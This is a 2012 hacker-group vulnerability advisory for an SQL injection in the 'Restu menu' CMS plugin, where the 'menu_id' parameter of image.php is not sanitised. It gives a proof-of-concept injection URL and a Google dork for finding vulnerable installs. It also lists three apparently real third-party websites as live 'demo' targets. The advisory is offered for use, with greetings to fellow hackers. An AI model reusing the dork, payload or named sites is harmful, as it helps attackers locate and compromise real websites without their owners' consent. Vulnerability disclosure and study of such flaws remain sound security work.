facebook facebook twitter rss

Restu menu Sql Vulnerability

Author: RetnOHacK , Published: 25-06-2012
---------------------------------------------------------------------------+
__________ __ ________ ___ ___ ____ __.
\______ \ _____/ |_ ____ \_____ \ / | \_____ ____ | |/ _|
| _// __ \ __\/ \ / | \/ ~ \__ \ _/ ___\| <
| | \ ___/| | | | \/ | \ Y // __ \\ \___| | \
|____|_ /\___ >__| |___| /\_______ /\___|_ /(____ /\___ >____|__ \
\/ \/ \/ \/ \/ \/ \/ \/
---------------------------------------------------------------------------+

---------------------- Vulnerability info ----------------------

[+]Title: Restu menu Sql Vulnerability
[+]Vendor: http://www.flickmedialtd.com/
[+]Date: 25/06/2012
[+]Author: RetnOHacK #Procoder'z Team Albania
[+]Email: RetnOHacK1@gmail.com , fb.me/root.procoderz
[+]Category: Webapps
[+]Dork: inurl:"/cmsadmin/" intext:"version-1.6.6"
[+]Tested on: Windows xp , Ubuntu BT~5


---------------------- Vulnerability Details ----------------------
[~]INFO:

Input passed via the "menu_id" parameter in image.php is not properly sanitised before being used in SQL queries.
So we can use it to inject our own SQL Code.


[~]Exploit/p0c:

www.site.com/cmsadmin/plugins/Resturant_menu/image.php?menu_id=[SQL]'


[~]Demo site: http://www.dhakahandicrafts.com/cmsadmin/plugins/product/image.php?menu_id=63'
http://www.baburchi.biz/cmsadmin/plugins/Resturant_menu/image.php?menu_id=93'
http://www.lagateau.co.uk/cmsadmin/plugins/Resturant_menu/image.php?menu_id=2'

---------------------------------------------------------------------------+

Greetz to : Mataty501, dA3m0n, wino, b4ti, R-t33n, 0x0, **RoAd_KiLlEr** & U

---------------------------------------------------------------------------+

Like us on Facebook :